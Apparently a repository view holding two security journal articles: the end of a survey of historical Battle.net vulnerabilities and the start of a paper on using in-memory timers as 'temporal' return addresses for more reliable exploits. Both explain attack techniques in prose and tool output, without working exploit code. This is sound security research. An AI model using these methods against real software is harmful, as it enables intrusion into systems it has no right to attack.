give rise to a great many problems. The version control and update mechanism
|
||||
is not separate from the rest of the protocol. Indeed, the same server, and
|
||||
the same connection, are used for version control, but a different connection
|
||||
to the same server is used for the transfer of client patches. As a result,
|
||||
any compliant Battle.net server is required to support not only the current
|
||||
Battle.net protocol version that is in use by the current patch level of every
|
||||
existing client, but it must also support the first few messages used by every
|
||||
single version of every single Battle.net client ever released, or at least
|
||||
until the version checking mechanism can be invoked to distribute a new
|
||||
version (which is not the first task that occurs in some older iterations of
|
||||
the protocol).
|
||||
|
||||
To make matters worse, there is now a proliferation of third party clients
|
||||
using the Battle.net protocol (to varying degrees of accuracy compared to the
|
||||
Blizzard game clients they attempt to emulate) in use on Battle.net today.
|
||||
This began sometime in mid-1999 when a program called ``NBBot'',authored by
|
||||
Andreas Hansson, who often goes by the handle ``Adron'', entered widespread
|
||||
distribution, though this was not the intent of the author. NBBot was the
|
||||
first third party client to emulate the Battle.net protocol to an extent that
|
||||
allowed it to masquerade as a game client. Several years later, the source
|
||||
code for this program was inadvertently released to wide-spread public
|
||||
distribution, which kicked off large-scale development of third party
|
||||
Battle.net protocol clients by a number of authors.
|
||||
|
||||
Despite all of these challenges, Blizzard has managed to keep Battle.net up
|
||||
and running for nearly a decade now, and claims over a million active users.
|
||||
However, the road leading up to the present day has not been ``clear sailing''
|
||||
for Blizzard. This leads us into some of the specific problems facing
|
||||
Battle.net leading up until the present day. One of the major classes of
|
||||
problems encountered by Blizzard as Battle.net has grown is that it was (in
|
||||
the author's opinion) simply not designed to support the circumstances in
|
||||
which it eventually ended up being used. This is evident in a variety of
|
||||
events that have occurred over the past few years:
|
||||
|
||||
- The addition of persistent player accounts to the system.
|
||||
- The addition of the text-based chat protocol to the system.
|
||||
- Significant changes to the backend architecture utilized by
|
||||
Battle.net.
|
||||
|
||||
Although it is difficult to provide exact details of these changes, having not
|
||||
worked at Blizzard, many of them can be inferred.
|
||||
|
||||
|
||||
3.1) Network issues
|
||||
|
||||
Battle.net was originally setup as a small number of linked servers placed at
|
||||
various strategic geographical locations. They were ``linked'' in the sense
|
||||
that players on one server could interact with players on a different server
|
||||
as seamlessly as with players connected to the same server. This architecture
|
||||
eventually proved unsupportable, as increasing usage of Battle.net led to the
|
||||
common occurrence of "server splits", in which one or more servers would be
|
||||
unable to keep up with the rest of the network and become temporarily
|
||||
disconnected.
|
||||
|
||||
Eventually, the system was split into two separate networks (each starting
|
||||
with a copy of all account and player data present at the time of the
|
||||
division): The Asian network, and United States and European network. Each
|
||||
network was comprised of a number of different servers that players could
|
||||
connect to in an optimized fashion based on server response time.
|
||||
|
||||
Some time later, even this system proved untenable. The network was once
|
||||
again permanently fragmented, this time splitting the United States and
|
||||
European network into three subnetworks. This is the topology retained today,
|
||||
with the networks designated ``USEast'', ``USWest'', ``Europe'', ``Asia''. It
|
||||
is believed that all servers in a server network (also referred to as a
|
||||
``cluster'' or ``gateway'') are, at present, located at the same physical
|
||||
hosting facility on a high-speed LAN.
|
||||
|
||||
As new game requirements came about, a new architecture for Diablo II and
|
||||
Warcraft III as required. In these cases, games are hosted on
|
||||
Blizzard-operated servers and not on client machines in order to make them
|
||||
more resilient from attempts to hack the game to gain an unfair advantage.
|
||||
There are significant differences to how this is implemented for Diablo II and
|
||||
Warcraft III, and it is not used for certain types of games in Warcraft III .
|
||||
This resulted in a significant change to the way the service performs it's
|
||||
primary function, that is, game matchmaking.
|
||||
|
||||
|
||||
3.2) Client/Server issues
|
||||
|
||||
Aside from the basic network design issues, other problems have arisen from
|
||||
the fact that Blizzard did not expect, or intend for, third party programs to
|
||||
use its Battle.net protocol. As a result, proper validation has not always
|
||||
been in place for certain conditions that would not be generated through the
|
||||
Blizzard client software.
|
||||
|
||||
As mentioned earlier, many developers eventually turned to the using the
|
||||
Battle.net protocol directly as opposed to the text-based protocol in order to
|
||||
circumvent certain limitations in the text-based protocol. There are a number
|
||||
of reasons for this. Historically, clients utilizing the Battle.net protocol
|
||||
have been able to enter channels that are already full (private channels on
|
||||
Battle.net have a limit of 40 users, normally), and have been able to perform
|
||||
various account management functions (such as creating accounts, changing
|
||||
passwords, managing user profile information, and so-forth) that are not
|
||||
doable through the text-based protocol.
|
||||
|
||||
In addition to having access to extended protocol-level functionality, clients
|
||||
using the Battle.net protocol are permitted to open up to eight connections to
|
||||
a single Battle.net network per IP address (as opposed to the text-based
|
||||
protocol, which only allows a single connection per IP address). This limit
|
||||
was originally four connections per IP address, and was raised after NATs,
|
||||
particularly in cyber cafes, gained popularity.
|
||||
|
||||
This was particularly attractive to a number of persons on Battle.net who used
|
||||
third-party chat clients for a variety of reasons. The primary reason was
|
||||
generally the same ``channel war'' phenomenon that has historically plagued
|
||||
IRC was also rather prevalent on Battle.net, and being able to field a large
|
||||
number of clients per IP address was seen as a significant advantage.
|
||||
|
||||
Due to the prevalence of ``channel wars'' on Battle.net, artificially large
|
||||
numbers of third-party clients utilizing the Battle.net protocol came into
|
||||
use. Although it is difficult to estimate the exact number of users of such
|
||||
clients, the author has observed upwards of several thousand being logged on
|
||||
to the service at once.
|
||||
|
||||
The development and usage of said third party clients has resulted in the
|
||||
discovery of a number of other issues with Battle.net. While most of the
|
||||
issues covered here are either already fixed or relatively minor, there is
|
||||
still value in discussing them.
|
||||
|
||||
|
||||
3.2.1) Client connection limits
|
||||
|
||||
Through the use of certain messages in the Battle.net protocol, it is possible
|
||||
to enter a channel beyond the normal 40 user limit. This was due to the fact
|
||||
that the method a game client would use to return to a chat channel after
|
||||
leaving a game would not properly check the user count. After miscreants
|
||||
exploited this vulnerability to put thousands of users into one channel, which
|
||||
subsequently lead to server crashes, Blizzard finally fixed this
|
||||
vulnerability.
|
||||
|
||||
|
||||
3.2.2) Chat message server overflow
|
||||
|
||||
The server software often assumed that the client would only perform 'sane'
|
||||
actions, and one of these assumptions dealt with how long of a chat message a
|
||||
client could send. The server apparently copied a chat message indicated by a
|
||||
Battle.net protocol client into a fixed 512-byte buffer without proper length
|
||||
checking, such that a client could crash a server by sending a long enough
|
||||
message. Due to the fact that Blizzard's server binaries are not publicly
|
||||
available, it would not have been easy to exploit this flaw to run arbitrary
|
||||
code on the server. This serious vulnerability was fixed within a day of
|
||||
being reported.
|
||||
|
||||
|
||||
3.2.3) Client authentication
|
||||
|
||||
Aside from general sanity checks, Blizzard also has had some issues relating
|
||||
to authentication. Blizzard currently has two systems in use for user account
|
||||
password authentication. In order to create a third party client, these
|
||||
systems had to be understood and third party implementations reduced. This
|
||||
has revealed several flaws in their implementation.
|
||||
|
||||
The first system Blizzard utilizes is challenge-response system that uses a
|
||||
SHA-1 hash of the client's password. The game client implementation of this
|
||||
system lowercases the entire password string before hashing it, significantly
|
||||
reducing password security. (A third party client could opt not to do this,
|
||||
and as such create an account that is impossible to log on to through the
|
||||
official Blizzard game clients or the text-based protocol. The text-based
|
||||
protocol sends a user's password in cleartext, after which the server
|
||||
lowercases the password and internally compares a hash of it with the account
|
||||
in question's password in a database.) However, a more serious security
|
||||
problem remains: in SHA-1, there are a number of bit rotate left (``ROL'')
|
||||
operations. The Blizzard programmer responsible for implementing this
|
||||
apparently switched the two parameters in every call to ROL. That is, if
|
||||
there was a ``define ROL(a, b) (...)'' macro, the programmer swapped the two
|
||||
arguments. This drastically reduces the security of Battle.net password
|
||||
hashes, as most of the data being hashed ends up being zero bits. Because of
|
||||
the problem of incompatibility with previously created accounts, this system
|
||||
is still in use today.
|
||||
|
||||
The second system Blizzard utilizes is one based off of SRP (Secure Remote
|
||||
Password, see http://srp.stanford.edu). Only Warcraft III and it's expansion
|
||||
use this system for password authentication. This product has it's own
|
||||
account namespace on Battle.net, so that there are no backwards compatibility
|
||||
issues with the older ``broken SHA-1'' method. It is worth noting that
|
||||
Warcraft III clients and older clients can still communicate via chat, however
|
||||
- the server imposes a namespace decoration to client account names for
|
||||
communication between namespaces, such that a client logged on as Warcraft III
|
||||
would see a user ``User'' logged on as Starcraft on the USEast Battle.net
|
||||
network as ``User@USEast''. However, this system is also flawed, albeit less
|
||||
severely. In particular, the endian-ness of calculations is reversed, but
|
||||
this is not properly accounted for in some parts of the implementation, such
|
||||
that some operations expecting to remove trailing zero bits instead remove
|
||||
leading zero bits after converting a large integer to a flat binary buffer.
|
||||
There is a second flaw, as well, although it does not negatively impact the
|
||||
security of the client: In some of the conversions from big numbers to flat
|
||||
buffers, the server does not properly zero out bytes if the big number does
|
||||
not occupy 32 non-zero bytes, and instead leaves uninitialized data in them.
|
||||
The result is that some authentication attempts will randomly fail. As far as
|
||||
the author knows, this bug is still present in Battle.net.
|
||||
|
||||
|
||||
3.2.4) Client namespace spoofing
|
||||
|
||||
With the release of Warcraft III, a separate account namespace was provided
|
||||
for users of that product, as mentioned above. The server internally keeps
|
||||
track of a user's account name as ``xusername'', where x is a digit specifying
|
||||
an alternate namespace (the only currently known namespace designation is 'w',
|
||||
for Warcraft III). This is known due to a message that exposes the internal
|
||||
unique name for a user to protocol clients. While the character '' has never
|
||||
been permitted in account names, if a user logs on to the same account more
|
||||
than once, they are assigned a unique name of the format 'accountnameserial',
|
||||
where 'serial' is a number that is incremented according to how many duplicate
|
||||
logons of the same account there are. Due to a lack of parameter checking in
|
||||
the account creation process, it was at one time possible to create
|
||||
accounts,via a third party client, that were one character long (all of the
|
||||
official game clients do not allow the user to do this). For some time, such
|
||||
accounts confused the server into thinking that a user was actually on a
|
||||
different (non-existent) namespace, and thus allowed a user who logged on to a
|
||||
single character account more than once to become impossible to 'target' via
|
||||
any of the user management functions. For example, such a user could not be
|
||||
sent a private message, ignored, banned or kicked from a channel, or otherwise
|
||||
affected by any other commands that operate on a specific user. This was, of
|
||||
course, frequently abused to spam individuals with the victims being unable to
|
||||
stop the spammer (or even ignore them!). This problem has been fixed in the
|
||||
current server version.
|
||||
|
||||
|
||||
3.2.5) Username collisions
|
||||
|
||||
As referred to in the previuos sub-section, for some time the server allowed
|
||||
Diablo Shareware clients. These clients did not log on to accounts, and
|
||||
instead simply assigned themselves a username. Normal procedures were
|
||||
followed if the username was already in use, which involved appending a serial
|
||||
number to the end to make a unique name. Besides the obvious problem of being
|
||||
able to impersonate someone to a user who was not clever enough to check what
|
||||
game type one was logged on as, this creates an additional vulnerability that
|
||||
was heavily exploited in ``channel wars''. If a server became split from the
|
||||
rest of the network due to load, one could log on to that server using Diablo
|
||||
Shareware, and pick the same name as someone logged on to the rest of the
|
||||
network using a different game type. When the server split was resolved, the
|
||||
server would notice that there were now two users with the same unique name,
|
||||
and disconnect both of them with the ``Duplicate username detected.'' message
|
||||
(this is synonymous with the ``colliding'' exploits of old that used to plague
|
||||
IRC). This could be used to force users offline any time a server split
|
||||
occurred. Being able to do so was desirable in the sense that there could
|
||||
normally only be one channel operator in a channel at a time (barring server
|
||||
splits, which could be used to create a second operator if the channel was
|
||||
entirely emptied and then recreated on the split server). When that operator
|
||||
left, the next person in line would be gifted with operator permissions
|
||||
(unless the operator had explicitly 'designated' a new heir for operator
|
||||
permissions). So, one could ``take over'' a channel by systematically
|
||||
disconnecting those ``ahead of'' one's client in a channel. A channel is
|
||||
ordered by a user's age in the channel.
|
||||
|
||||
|
||||
3.2.6) Server de-synchronization
|
||||
|
||||
At one time, a race condition such that if a malicious user were to log on to
|
||||
two connected (i.e. not-split) servers at the same time, the two servers would
|
||||
cease to communicate with another, causing a server split to occur. It is
|
||||
difficult to provide an exact explanation for why this would occur given the
|
||||
collision elimination mechanism described above for users that are logged on
|
||||
with the same unique name, but it is assumed that in the process of
|
||||
synchronizing a new user between servers, there is a period of time where that
|
||||
a second server can also attempt to synchronize the same user and cause one of
|
||||
the servers to get into a invalid state. According to observations, this
|
||||
invalid state would eventually be resolved automatically, usually after 10-15
|
||||
minutes.
|
||||
|
||||
|
||||
3.2.7) Seeing invisible users
|
||||
|
||||
Battle.net administrators have the ability to become invisible to normal
|
||||
users. However, until recently, this was flawed in that the server would
|
||||
expose the existence of an invisible user to regular users during certain
|
||||
operations. In particular, if one ignores or unignores a user, the server
|
||||
will re-send the state of all users that are ignored or unignored in the
|
||||
current channel. Before this bug was fixed, this list included any invisible
|
||||
users. It is worth noting that the official game clients will ignore any
|
||||
unknown users returned in the state update message, so this vulnerability
|
||||
could only be utilized by a third party client.
|
||||
|
||||
|
||||
3.2.8) Administrative command discovery
|
||||
|
||||
Originally, Battle.net would provide no acknowledgement if one issued an
|
||||
unrecognized chat command ("slash-command"). Blizzard later changed the
|
||||
server software to respond with an error message if a user sent an unknown
|
||||
command, but the server originally silently ignored the command if the user
|
||||
issued a privileged (administrator-only) command. This allowed end users to
|
||||
discover the names of various commands accessible to system administrators.
|
||||
|
||||
|
||||
3.2.9) Gaining administrative privileges
|
||||
|
||||
Due to an oversight in the way administrator permissions are assigned to
|
||||
Battle.net accounts, it was at one time possible to overwrite the account of
|
||||
an administrator with a new account and keep the special permissions otherwise
|
||||
associated with the account. (An account can be overwritten like so if it has
|
||||
not been accessed in 90 days). This could have very nearly resulted in a
|
||||
disaster for Blizzard, had a more malicious user discovered this vulnerability
|
||||
and abused such privileges.
|
||||
|
||||
|
||||
3.2.10) Obtaining passwords
|
||||
|
||||
Eventually, Blizzard implemented a password recovery mechanism whereby one
|
||||
could associate an e-mail address with an account, and request a password
|
||||
change through the Battle.net protocol for an account at logon time. This
|
||||
would result in an e-mail being dispatched to the registered address. If the
|
||||
user then replied to the mail as instructed, they would be automatically
|
||||
mailed back with a new account password. Unfortunately, as originally
|
||||
implemented, this system did not properly perform validation on the
|
||||
confirmation mail that the user was required to send. In particular, if a
|
||||
malicious user created an account ``victim'' on one Battle.net network, such
|
||||
as the Asian network, and then requested a password reset for that account,
|
||||
they could alter the return email slightly and actually reset the password for
|
||||
the account ``victim'' on a different Battle.net network, such as the USEast
|
||||
network. This exploit was actually publicly disclosed and saw over a day of
|
||||
heavy abuse before Blizzard managed to patch it.
|
||||
|
||||
|
||||
4) Battle.net server emulation
|
||||
|
||||
Blizzard 'declared war' on the programmers of servers that implement the
|
||||
Battle.net protocol some time ago when they took the developers of ``bnetd''
|
||||
to court. As of Warcraft III, they have taken active measures to make life
|
||||
difficult for developers programming third party Battle.net-compatible
|
||||
servers. In particular, two actions are of note:
|
||||
|
||||
During the Warcraft III Expansion beta test, Blizzard implemented an
|
||||
encryption scheme for the Battle.net protocol (this was only used during the
|
||||
beta test and not on production Battle.net). This consisted of using the RC4
|
||||
cipher to encrypt messages send and received from the server. The tricky part
|
||||
was that Blizzard had hardcoded constants that were encrypted using the cipher
|
||||
state, but never actually sent on the wire (these constants were different for
|
||||
each message). This made implementing a server difficult, as one had to find
|
||||
each magic constant. Unfortunately, Blizzard neglected to consider the policy
|
||||
of someone releasing a hacked version of the client that zeroed the RC4
|
||||
initialization parameters, such that the entire encrypted stream became
|
||||
plaintext.
|
||||
|
||||
After several patches, Blizzard implemented a scheme by which a Warcraft III
|
||||
client could verify that it was indeed connecting to a genuine Blizzard
|
||||
Battle.net server. This scheme worked by having the Battle.net server sign
|
||||
it's IP address and send the resulting signature to the client, which would
|
||||
refuse to log on if the server's IP address did not match the signature.
|
||||
However, in the original implementation, the game client only checked the
|
||||
first four bytes of the signed data, and did not validate the remaining
|
||||
(normally zero) 124 bytes. This allows one to easily brute-force a signature
|
||||
that has a designed IP address, as one only has to check 32 bits of possible
|
||||
signatures at most to find it.
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
Developing a platform to support a diverse set of requirements such as
|
||||
Battle.net is certainly no easy task. Though the original design could have
|
||||
perhaps been improved upon, it is the author's opinion that given what they
|
||||
had to work with, Blizzard did a reasonable job of ensuring that the service
|
||||
they set out to create stood the test of time, especially considering that
|
||||
support for all the future features of their later game clients could not have
|
||||
been predicted at the time the system was originally created. Nevertheless, it
|
||||
is the author's opinion that a system designed where clients are untrusted and
|
||||
all actions performed by them are subject to full validation would have been
|
||||
far more secure from the start, without any of the various problems Blizzard
|
||||
has encountered over the years.
|
971
uninformed/2.2.txt
Normal file
971
uninformed/2.2.txt
Normal file
|
@ -0,0 +1,971 @@
|
|||
Temporal Return Addresses: Exploitation Chronomancy
|
||||
skape
|
||||
mmiller@hick.org
|
||||
Last modified: 8/6/2005
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: Nearly all existing exploitation vectors depend on some knowledge of
|
||||
a process' address space prior to an attack in order to gain meaningful
|
||||
control of execution flow. In cases where this is necessary, exploit authors
|
||||
generally make use of static addresses that may or may not be portable between
|
||||
various operating system and application revisions. This fact can make
|
||||
exploits unreliable depending on how well researched the static addresses were
|
||||
at the time that the exploit was implemented. In some cases, though, it may
|
||||
be possible to predict and make use of certain addresses in memory that do not
|
||||
have static contents. This document introduces the concept of temporal
|
||||
addresses and describes how they can be used, under certain circumstances, to
|
||||
make exploitation more reliable.
|
||||
|
||||
Disclaimer: This document was written in the interest of education. The
|
||||
author cannot be held responsible for how the topics discussed in this
|
||||
document are applied.
|
||||
|
||||
Thanks: The author would like to thank H D Moore, spoonm, thief, jhind,
|
||||
johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of
|
||||
nologin!
|
||||
|
||||
With that, on with the show...
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
A common impediment to the implementation of portable and reliable exploits is
|
||||
the location of a return address. It is often required that a specific
|
||||
instruction, such as a jmp esp, be located at a predictable location in memory
|
||||
so that control flow can be redirected into an attacker controlled buffer.
|
||||
This scenario is more common on Windows, but applicable scenarios exist on
|
||||
UNIX derivatives as well. Many times, though, the locations of the
|
||||
instructions will vary between individual versions of an operating system,
|
||||
thus limiting an exploit to a set of version-specific targets that may or may
|
||||
not be directly determinable at attack time. In order to make an exploit
|
||||
independent of, or at least less dependent on, a target's operating system
|
||||
version, a shift in focus becomes necessary.
|
||||
|
||||
Through the blur of rhyme and reason an attacker might focus and realize that
|
||||
not all viable return addresses will exist indeterminably in a target process'
|
||||
address space. In fact, viable return addresses can be found in a transient
|
||||
state throughout the course of a program's execution. For instance, a pointer
|
||||
might be stored at a location in memory that happens to contain a viable two
|
||||
byte instruction somewhere within the bytes that compose the pointer's
|
||||
address. Alternatively, an integer value somewhere in memory could be
|
||||
initialized to a value that is equivalent to a viable instruction. In both
|
||||
cases, though, the contents and locations of the values will almost certainly
|
||||
be volatile and unpredictable, thus making them unsuitable for use as return
|
||||
addresses.
|
||||
|
||||
Fortunately, however, there does exist at least one condition that can lend
|
||||
itself well to portable exploitation that is bounded not by the operating
|
||||
system version the target is running on, but instead by a defined window of
|
||||
time. In a condition such as this, a timer of some sort must exist at a
|
||||
predictable location in memory that is known to be updated at a constant time
|
||||
interval, such as every second. The location in memory that the timer resides
|
||||
at is known as a temporal address. On top of this, it is also important for
|
||||
the attacker determine the scale of measurement the timer is operating on,
|
||||
such as whether or not it's measured in epoch time (from 1970 or 1601) or if
|
||||
it's simply acting as a counter. With these three elements identified, an
|
||||
attacker can attempt to predict the periods of time where a useful instruction
|
||||
can be found in the bytes that compose the future state of any timer in
|
||||
memory.
|
||||
|
||||
To help illustrate this, suppose an attacker is attempting to find a reliable
|
||||
location of a jmp edi instruction. The attacker knows that the program being
|
||||
exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a
|
||||
predictable location in memory. By doing some analysis, the attacker could
|
||||
determine that on Wednesday July 27th, 2005 at 3:39:12PM CDT, a jmp edi could
|
||||
be found within any four byte timer that stores the number of seconds since
|
||||
1970. The window of opportunity, however, would only last for 4 minutes and 16
|
||||
seconds assuming the timer is updated every second.
|
||||
|
||||
By accounting for timing as a factor in the selection of return addresses, an
|
||||
attacker can be afforded options beyond those normally seen when the address
|
||||
space of a process is viewed as unchanging over time. In that light, this
|
||||
document is broken into three portions. First, the steps needed to find,
|
||||
analyze, and make use of temporal addresses will be explained. Second,
|
||||
upcoming viable opcode windows will be shown and explained along with methods
|
||||
that can be used to determine target time information prior to exploitation.
|
||||
Finally, examples of commonly occurring temporal addresses on Windows NT+ will
|
||||
be described and analyzed to provide real world examples of the subject of
|
||||
this document.
|
||||
|
||||
Before starting, though, it is important to understand some of the terminology
|
||||
that will be used, or perhaps abused, in the interest of conveying the
|
||||
concepts. The term temporal address is used to describe a location in memory
|
||||
that contains a timer of some sort. The term opcode is used interchangeably
|
||||
with the term instruction to convey the set of viable bytes that could
|
||||
partially compose a given temporal state. The term update period is used to
|
||||
describe the amount of time that it takes for the contents of a temporal
|
||||
address to change. Finally, the term scale is used to describe the unit of
|
||||
measure for a given temporal address.
|
||||
|
||||
|
||||
3) Locating Temporal Addresses
|
||||
|
||||
In order to make use of temporal addresses it is first necessary to devise a
|
||||
method of locating them. To begin this search it is necessary that one
|
||||
understand the attributes of a temporal address. All temporal addresses are
|
||||
defined as storing a time-associated counter that increments at a constant
|
||||
interval. For instance, an example would be a location in memory that stores
|
||||
the number of seconds since Jan. 1, 1970 that is incremented every second. As
|
||||
a more concrete definition, all time-associated counters found in memory are
|
||||
represented in terms of a scale (the unit of measure), an interval or period
|
||||
(how often they are updated), and have a maximum storage capacity (variable
|
||||
size). If any these parts are unknown or variant for a given memory location,
|
||||
it is impossible for an attacker to consistently leverage it for use as
|
||||
time-bounded return address because of the inability to predict the byte
|
||||
values at the location for a given period of time.
|
||||
|
||||
With the three major components of a temporal address identified (scale,
|
||||
period, and capacity), a program can be written to search through a process'
|
||||
address space with the goal of identifying regions of memory that are updated
|
||||
at a constant period. From there, a scale and capacity can be inferred based
|
||||
on an arbitrarily complex set of heuristics, the simplest of which can
|
||||
identify regions that are storing epoch time. It's important to note, though,
|
||||
that not all temporal addresses will have a scale that is measured as an
|
||||
absolute time period. Instead, a temporal address may simply store the number
|
||||
of seconds that have passed since the start of execution, among other
|
||||
scenarios. These temporal addresses are described as having a scale that is
|
||||
simply equivalent to their period and are for that reason referred to as
|
||||
counters.
|
||||
|
||||
To illustrate the feasibility of such a program, the author has implemented an
|
||||
algorithm that should be conceptually portable to all platforms, though the
|
||||
implementation itself is limited to Windows NT+. The approach taken by the
|
||||
author, at a high level, is to poll a process' address space multiple times
|
||||
with the intention of analyzing changes to the address space over time. In
|
||||
order to reduce the amount of memory that must be polled, the program is also
|
||||
designed to skip over regions that are backed against an image file or are
|
||||
otherwise inaccessible.
|
||||
|
||||
To accomplish this task, each polling cycle is designed to be separated by a
|
||||
constant (or nearly constant) time interval, such as 5 seconds. By increasing
|
||||
the interval between polling cycles the program can detect temporal addresses
|
||||
that have a larger update period. The granularity of this period of time is
|
||||
measured in nanoseconds in order to support high resolution timers that may
|
||||
exist within the target process' address space. This allows the program to
|
||||
detect timers measured in nanoseconds, microseconds, milliseconds, and
|
||||
seconds. The purpose of the delay between polling cycles is to give temporal
|
||||
address candidates the ability to complete one or more update periods. As
|
||||
each polling cycle occurs, the program reads the contents of the target
|
||||
process' address space for a given region and caches it locally within the
|
||||
scanning process. This is necessary for the next phase.
|
||||
|
||||
After at least two polling cycles have completed, the program can compare the
|
||||
cached memory region differences between the most recent view of the target
|
||||
process' address space and the previous view. This is accomplished by walking
|
||||
through the contents of each cached memory region in four byte increments to
|
||||
see if there is any difference between the two views. If a temporal address
|
||||
exists, the contents of a the two views should have a difference that is no
|
||||
larger than the maximum period of time that occurred between the two polling
|
||||
cycles. It's important to remember that the maximum period can be conveyed
|
||||
down to nanosecond granularity. For instance, if the polling cycle period was
|
||||
5 seconds, any portion of memory that changed by more than 5 seconds, 5000
|
||||
milliseconds, or 5000000 microseconds is obviously not a temporal address
|
||||
candidate. To that point, any region of memory that didn't change at all is
|
||||
also most likely not a temporal address candidate, though it is possible that
|
||||
the region of memory simply has an update period that is longer than the
|
||||
polling cycle.
|
||||
|
||||
Once a memory location is identified that has a difference between the two
|
||||
views that is within or equal to the polling cycle period, the next step of
|
||||
analysis can begin. It's perfectly possible for memory locations that meet
|
||||
this requirement to not actually be timers, so further analysis is necessary
|
||||
to weed them out. At this point, though, memory locations such as these can
|
||||
be referred to as temporal address candidates. The next step is to attempt to
|
||||
determine the period of the temporal address candidate. This is accomplished
|
||||
by some rather silly, but functional, logic.
|
||||
|
||||
First, the delta between the polling cycles is calculated down to nanosecond
|
||||
granularity. In a best case scenario, the granularity of a polling cycle that
|
||||
is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to
|
||||
assume this constant though, as thread scheduling and other non-constant
|
||||
parameters can affect the delta between polling cycles for a given memory
|
||||
region. The next step is to iteratively compare the difference between the
|
||||
two views to the current delta to see if the difference is greater than or
|
||||
equal to the current delta. If it is, it can be assumed that the difference
|
||||
is within the current unit of measure. If it's not, the current delta should
|
||||
be divided by 10 to progress to the next unit of measure. When broken down,
|
||||
the progressive transition in units of measurement is described in figure 3.1.
|
||||
|
||||
|
||||
Delta Measurement
|
||||
---------------------------
|
||||
1000000000 Nanoseconds
|
||||
100000000 10 Nanoseconds
|
||||
10000000 100 Nanoseconds
|
||||
1000000 Microseconds
|
||||
100000 10 Microseconds
|
||||
10000 100 Microseconds
|
||||
1000 Milliseconds
|
||||
100 10 Milliseconds
|
||||
10 100 Milliseconds
|
||||
1 Seconds
|
||||
|
||||
Figure 3.1: Delta measurement reductions
|
||||
|
||||
|
||||
Once a unit of measure for the update period is identified, the difference is
|
||||
divided by the current delta to produce the update period for a given temporal
|
||||
address candidate. For example, if the difference was 5 and the current delta
|
||||
was 5, the update period for the temporal address candidate would be 1 second
|
||||
(5 updates over the course of 5 seconds). With the update period identified,
|
||||
the next step is to attempt to determine the storage capacity of the temporal
|
||||
address candidate.
|
||||
|
||||
In this case, the author chose to take a shortcut, though there are most
|
||||
certainly better approaches that could be taken given sufficient interest.
|
||||
The author chose to assume that if the update period for a temporal address
|
||||
candidate was measured in nanoseconds, then it was almost certainly at least
|
||||
the size of a 64-bit integer (8 bytes on x86). On the other hand, all other
|
||||
update periods were assumed to imply a 32-bit integer (4 bytes on x86).
|
||||
|
||||
With the temporal address candidate's storage capacity identified in terms of
|
||||
bytes, the next step is to identify the scale that the temporal address may be
|
||||
conveying (the timer's unit of measure). To accomplish this, the program
|
||||
calculates the number of seconds since 1970 and 1601 between the current time
|
||||
minus at least equal the polling cycle period and the current time itself.
|
||||
The temporal address candidate's current value (as stored in memory) is then
|
||||
converted to seconds using the determined update period and then compared
|
||||
against the two epoch time ranges. If the candidate's converted current value
|
||||
is within either epoch time range then it can most likely be assumed that the
|
||||
temporal address candidates's scale is measured from epoch time, either from
|
||||
1970 or 1601 depending on the range it was within. While this sort of
|
||||
comparison is rather simple, any other arbitrarily complex set of logic could
|
||||
be put into place to detect other types of time scales. In the event that
|
||||
none of the logic matches, the temporal address candidate is deemed to simply
|
||||
have a scale of a counter (as defined previously in this chapter).
|
||||
|
||||
Finally, with the period, scale, and capacity for the temporal address
|
||||
candidate identified, the only thing left is to check to see if the three
|
||||
components are equivalent to previously collected components for the given
|
||||
temporal address candidate. If they differ in orders of magnitude then it is
|
||||
probably safe to assume that the candidate is not actually a temporal address.
|
||||
On the other, consistent components between polling cycles for a temporal
|
||||
address candidate are almost a sure sign that it is indeed a temporal address.
|
||||
|
||||
When everything is said and done, the program should collect every temporal
|
||||
address in the target process that has an update period less than or equal to
|
||||
the polling cycle period. It should also have determined the scale and size
|
||||
of the temporal address. When run on Windows against a program that is
|
||||
storing the current epoch time since 1970 in seconds in a variable every
|
||||
second, the following output is displayed:
|
||||
|
||||
|
||||
C:\>telescope 2620
|
||||
[*] Attaching to process 2620 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
|
||||
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
This output tells us that the address of the variable that is storing the
|
||||
epoch time since 1970 can be found at 0x0012FF7C and has an update period of
|
||||
one second. The other things that were found will be discussed later in this
|
||||
document.
|
||||
|
||||
|
||||
3.1) Determining Per-byte Durations
|
||||
|
||||
Once the update period and size of a temporal address have been determined, it
|
||||
is possible to calculate the amount of time it takes to change each byte
|
||||
position in the temporal address. For instance, if a four byte temporal
|
||||
address with an update period of 1 second were found in memory, the first byte
|
||||
(or LSB) would change once every second, the second byte would change once
|
||||
every 256 seconds, the third byte would change once every 65536 seconds, and
|
||||
the fourth byte would change once every 16777216 seconds. The reason these
|
||||
properties are exhibited is because each byte position has 256 possibilities
|
||||
(0x00 to 0xff inclusive). This means that each byte position increases in
|
||||
duration by 256 to a given power. This can be described as shown in figure
|
||||
3.2. Let x equal the byte index starting at zero for the LSB.
|
||||
|
||||
|
||||
duration(x) = 256 ^ x
|
||||
|
||||
Figure 3.2: Period independent byte durations
|
||||
|
||||
The next step to take after determining period-specific byte durations is to
|
||||
convert the durations to a measure more aptly accessible assuming a period
|
||||
that is more granular than a second. For instance, figure shows that if each
|
||||
byte duration is measured in 100 nanosecond intervals for an 8 byte temporal
|
||||
address, a conversion can be applied to convert from 100 nanosecond intervals
|
||||
for a byte duration to seconds.
|
||||
|
||||
|
||||
tosec(x) = duration(x)/107
|
||||
|
||||
Figure 3.3: 100 nanosecond byte durations to seconds
|
||||
|
||||
|
||||
This phase is especially important when it comes to calculating viable opcode
|
||||
windows because it is necessary to know for how long a viable opcode will
|
||||
exist which is directly dependent on the direction of the opcode byte closest
|
||||
to the LSB. This will be discussed in more detail in chapter 4.
|
||||
|
||||
|
||||
4) Calculating Viable Opcode Windows
|
||||
|
||||
Once a set of temporal addresses has been located, the next logical step is to
|
||||
attempt to calculate the windows of time that one or more viable opcodes can
|
||||
be found within the bytes of the temporal address. It is also just as
|
||||
important to calculate the duration of each byte within the temporal address.
|
||||
